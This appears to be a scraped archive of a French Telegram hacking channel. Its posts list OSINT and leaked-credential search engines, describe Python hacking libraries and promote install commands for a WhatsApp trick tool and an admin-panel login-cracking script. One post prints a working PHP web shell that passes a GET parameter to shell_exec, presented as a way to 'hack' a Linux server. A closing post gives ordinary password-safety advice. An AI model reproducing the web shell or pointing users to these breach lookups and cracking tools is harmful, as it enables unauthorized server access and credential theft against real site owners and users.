Tech - IA - Hacking - Astuces
前往频道在 Telegram
无数据
订阅者
-724 小时
-347 天
-3430 天
帖子存档
🔥 Voici 30 moteurs de recherche de cybersécurité :
1. Dehashed—Afficher les informations d'identification divulguées.
2. SecurityTrails—Données DNS étendues.
3. DorkSearch—Dork Google très rapide.
4. ExploitDB—Archive de divers exploits.
5. ZoomEye—Recueillir des informations sur les cibles.
6. Pulsedive : recherchez des informations sur les menaces.
7. GrayHatWarefare : recherchez des compartiments S3 publics.
8. PolySwarm—Analysez les fichiers et les URL à la recherche de menaces.
9. Fofa—Recherchez diverses informations sur les menaces.
10. LeakIX—Recherchez des informations indexées publiquement.
11. DNSDumpster—Recherchez rapidement des enregistrements DNS.
13. FullHunt—Recherche et découverte des surfaces d'attaque.
14. AlienVault : flux complet de renseignements sur les menaces.
12. ONYPHE—Collecte des données de renseignements sur les cybermenaces.
15. Application Grep : recherchez parmi un demi-million de dépôts git.
17. Analyse d'URL—Service gratuit d'analyse et d'analyse de sites Web.
18. Vulners—Recherchez des vulnérabilités dans une grande base de données.
19. WayBackMachine—Affichez le contenu des sites Web supprimés.
16. Shodan—Recherche des appareils connectés à Internet.
21. Netlas : recherchez et surveillez les ressources connectées à Internet.
22. CRT sh—Recherche les certificats qui ont été consignés par CT.
20. Wigle—Base de données des réseaux sans fil, avec des statistiques.
23. PublicWWW—Recherche marketing et marketing d'affiliation.
24. Binary Edge : analyse Internet à la recherche de renseignements sur les menaces.
25. GreyNoise—Recherche des appareils connectés à Internet.
26. Hunter—Recherche des adresses e-mail appartenant à un site Web.
27. Censys—Évaluation de la surface d'attaque pour les appareils connectés à Internet.
28. IntelligenceX—Recherchez Tor, I2P, les fuites de données, les domaines et les e-mails.
29. Packet Storm Security : parcourez les dernières vulnérabilités et exploits.
30. Coding Tech: la chaîne Telegram en cliquant ici
31. SearchCode : recherchez 75 milliards de lignes de code dans 40 millions de projets.
🎐 Modules Python utilisés dans le piratage 🎐
* Demandes
* Scapy
* IMpack
* Cryptographie
* Python-nmap
* LibNet
🎐 Requests = Requests est une bibliothèque HTTP simple pour Python qui permet à un utilisateur d'envoyer des requêtes HTTP/1.1 extrêmement facilement. Cette bibliothèque aide à créer des applications HTTP robustes et comprend des fonctionnalités intuitives telles que la décompression et le décodage automatiques du contenu, les délais de connexion, l'authentification de base et numérique, entre autres
🎐 Scapy = Scapy est un puissant programme et bibliothèque interactifs de manipulation de paquets basés sur Python. Cette bibliothèque est capable de falsifier ou de décoder des paquets d'un grand nombre de protocoles, de les envoyer sur le réseau, de les capturer, de les stocker ou de les lire à l'aide de fichiers pcap, de faire correspondre les requêtes, etc. Il permet la construction d'outils qui peuvent facilement scanner ou attaquer les réseaux. Il est conçu pour permettre un prototypage rapide des paquets en utilisant des valeurs par défaut qui fonctionnent. Il peut également effectuer des tâches telles que l'envoi de trames invalides, l'injection de vos propres trames 802.11, la combinaison de techniques telles que le saut de VLAN avec l'empoisonnement du cache ARP, le décodage VOIP sur un canal crypté WEP, etc., ce que la plupart des autres outils ne peuvent pas
🎐 IMpackt = IMpacket est une bibliothèque qui comprend une collection de classes Python pour travailler avec des protocoles réseau. Il se concentre sur la fourniture d'un accès programmatique de bas niveau aux paquets réseau. Il permet aux développeurs Python de créer et de décoder des paquets réseau de manière simple et cohérente. La bibliothèque fournit un ensemble d'outils comme exemples de ce qui peut être fait dans le cadre de cette bibliothèque
🎐 Cryptography = Cryptography est un package qui fournit des recettes et des primitives cryptographiques aux développeurs Python. Il comprend à la fois des recettes de haut niveau et des interfaces de bas niveau vers des algorithmes cryptographiques courants tels que les chiffrements symétriques, les résumés de messages et les fonctions de dérivation de clé. Cette bibliothèque est globalement divisée en deux niveaux. L'une concerne les recettes cryptographiques sûres qui nécessitent peu ou pas de choix de configuration. L'autre niveau est celui des primitives cryptographiques de bas niveau, qui sont souvent dangereuses et peuvent être utilisées de manière incorrecte
🎐 Python-Nmap = C'est une bibliothèque Python qui aide à utiliser le scanner de port Nmap. La bibliothèque permet la manipulation des résultats d'analyse Nmap et constitue un outil parfait pour les administrateurs système qui souhaitent automatiser les tâches et les rapports d'analyse. Il prend également en charge les sorties de script Nmap
🎐 Pylibnet = Pylibnet est un module Python pour la bibliothèque d'injection de paquets libnet. Il s'agit essentiellement d'un wrapper Python pour la bibliothèque d'injection de paquets libnet. Libnet est une API qui aide à la construction et à l'injection de paquets réseau. Il fournit également un cadre portable pour l'écriture et la gestion de paquets réseau de bas niveau. Libnet inclut la création de paquets au niveau de la couche IP et de la couche liaison ainsi qu'une foule de fonctionnalités supplémentaires et complémentaires
🎐 Raw Socket Py = Raw socket est une bibliothèque Python de couche 2 pour la communication en utilisant uniquement les adresses MAC. La bibliothèque permet de créer un système de communication Ethernet/WiFi sur mesure sans utiliser IP ou TCP/UDP. Il peut également déboguer des trames personnalisées telles que SERCOS III, Profibus, ARP, PTP, etc. Il permet à un utilisateur d'implémenter une communication de couche 2 personnalisée à l'aide de sockets bruts dans Python version 2 et 3 avec et sans rappels de manière synchrone et asynchrone.
Moteurs de recherche #DataBreach .
🔍 Certains des meilleurs moteurs de recherche de violation de données (DataBreach) 💢
∙ https://leak.sx/
∙ https://intelx.io/
∙ https://leakcheck.io/
∙ https://weleakinfo.to/
∙ https://leakpeek.com/
∙ https://snusbase.com/
∙ https://t.me/codingtutotech
∙ https://wikileaks.org/
Hacking Activity : pirater un système Linux Ubuntu à l'aide de PHP
#codingtutotech
Dans ce scénario pratique, nous apprendrons comment pirater Ubuntu et nous vous fournirons des informations de base sur la façon dont vous pouvez utiliser PHP pour compromettre un Linux. Nous n'allons cibler aucune victime. Si vous voulez l'essayer, vous pouvez installer LAMPP sur votre machine locale.
PHP est livré avec deux fonctions qui peuvent être utilisées pour exécuter des commandes de piratage Linux. Il a les fonctions exec() et shell_exec(). La fonction exec() renvoie la dernière ligne de la sortie de la commande tandis que shell_exec() renvoie le résultat complet de la commande sous forme de chaîne.
À des fins de démonstration, supposons que les gestionnaires de l'attaquant téléchargent le fichier suivant sur un serveur Web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>⚠️ Intelligence artificielle: les 30 outils d'IA à connaître d'urgence
Lisez la publication ici: https://www.codingteam.site/d/14-intelligence-artificielle-les-30-meilleurs-outils-a-tester-durgence
08 outils d'IA à connaître en 2023
» https://www.codingteam.site/d/10-les-08-ia-a-connaitre-en-2023
08 outils d'IA à connaître et à utiliser en 2023
>> https://www.codingteam.site/d/10-les-08-ia-a-connaitre-en-2023
08 outils pour créer des chatbots
>> https://www.codingteam.site/blog/6-08-outils-pour-creer-des-chatbots
WACHAT
Piéger vos amis et forcez-les à dire quelque chose que vous voulez
à quelqu'un une fois raccourci. Ce script aide à générer un lien :)
INSTALLATION
【✔】
git clone https://github.com/Err0r-ICA/WAchat
【✔】cd WAchat
【✔】bash WAchat
⚠️ Coding Tech — t.me/codingtutotechTout_savoir_des_réseaux_informatiques_en_quelques_heures_part1.rar1024.00 MB
Tout_savoir_des_réseaux_informatiques_en_quelques_heures_part2.rar493.87 MB
❕Protéger ses mots de passe est crucial pour éviter le vol d'identité et la perte de données sensibles. Les attaques de phishing et de brute force sont quelques-unes des techniques les plus courantes utilisées pour voler des mots de passe. Heureusement, avec les bonnes pratiques et les bonnes habitudes, vous pouvez protéger vos mots de passe contre ces menaces en ligne.
📖 Voici un tutoriel sur la façon de protéger vos mots de passe contre le phishing, brute force et autres formes d'attaques en ligne :
1. Créez des mots de passe complexes et uniques
Un mot de passe complexe est un mot de passe qui est difficile à deviner. Il doit contenir des chiffres, des lettres majuscules et minuscules et des caractères spéciaux. Vous pouvez utiliser les phrases pour créer des mots de passe forts et uniques. Par exemple, "Je bois du café tous les matins" peut devenir "JbDc2lMtMs!" en utilisant les premières lettres de chaque mot.
2. Utilisez un gestionnaire de mots de passe
Un gestionnaire de mots de passe est un programme qui stocke vos mots de passe de manière sécurisée. Il vous permet de créer des mots de passe forts et uniques pour chaque site Web que vous utilisez sans avoir à les mémoriser tous. Les gestionnaires de mots de passe vous permettent également de stocker des informations confidentielles telles que les numéros de carte de crédit et les informations de compte.
3. N'utilisez pas le même mot de passe pour tous les comptes
L'utilisation du même mot de passe pour tous les comptes est l'une des erreurs les plus courantes commises en matière de sécurité. Si un pirate informatique découvre votre mot de passe, il peut accéder à tous vos comptes. Utilisez un mot de passe différent pour chaque compte.
4. Évitez de partager vos mots de passe
N'envoyez jamais votre mot de passe à une personne qui vous le demande par email ou par message. Les services en ligne ne vous demanderont jamais votre mot de passe, donc, si vous recevez une demande de ce type, il s'agit probablement d'une tentative d'arnaque.
5. Utilisez la double authentification
La double authentification est une mesure de sécurité supplémentaire qui rend plus difficile l'obtention de vos informations de connexion. La double authentification utilise deux facteurs d'authentification, généralement quelque chose que vous savez (mot de passe) et quelque chose que vous avez (code envoyé par SMS ou application d'authentification). De cette façon, même si un attaquant obtient votre mot de passe, il aura encore besoin du deuxième facteur pour accéder à votre compte.
6. Méfiez-vous des emails et des liens suspects
Les attaques de phishing utilisent souvent des emails et des liens pour tenter de récupérer vos informations de connexion. Les emails de phishing peuvent sembler authentiques, mais ils peuvent également contenir des fautes d'orthographe et de grammaire. Les liens de phishing peuvent vous rediriger vers des sites Web frauduleux qui ressemblent à des sites Web légitimes. Soyez conscient des emails et des liens suspects, et n'ouvrez ni ne cliquez sur rien que vous ne faites pas confiance.
En suivant ces étapes, vous pouvez protéger vos mots de passe contre le phishing, brute force et autres formes d'attaques en ligne. Une bonne pratique est de changer régulièrement vos mots de passe et de les mettre à jour tous les six mois pour renforcer votre sécurité en ligne.
>> t.me/codingtutotech
🔒Comment protège ses mots de passe contre le phishing, brute force et autres formes d'attaques en ligne #security #sensibilisation
Installation : pour utiliser "Admin Hack", tapez les commandes suivantes sur votre terminal (Termux !)
•
pkg upgrade
• pkg update
• pkg install git
• git clone https://github.com/mishakorzik/AdminHack
• cd AdminHack
• bash setup.sh
Une fois installé suivez les instructions qui sont prescrits en anglais :)Admin Hack : un script pour trouver les informations de connexion de l'administrateur d'un site web et les vulnérabilités EAR
📖 Brève explication
le piratage d'un panneau d'administration fait référence à l'obtention d'un accès non autorisé au panneau de contrôle administratif d'un site Web ou d'une application Web. Cela peut être réalisé grâce à diverses techniques telles que l'injection SQL, les scripts intersites, les attaques par force brute et d'autres méthodes.
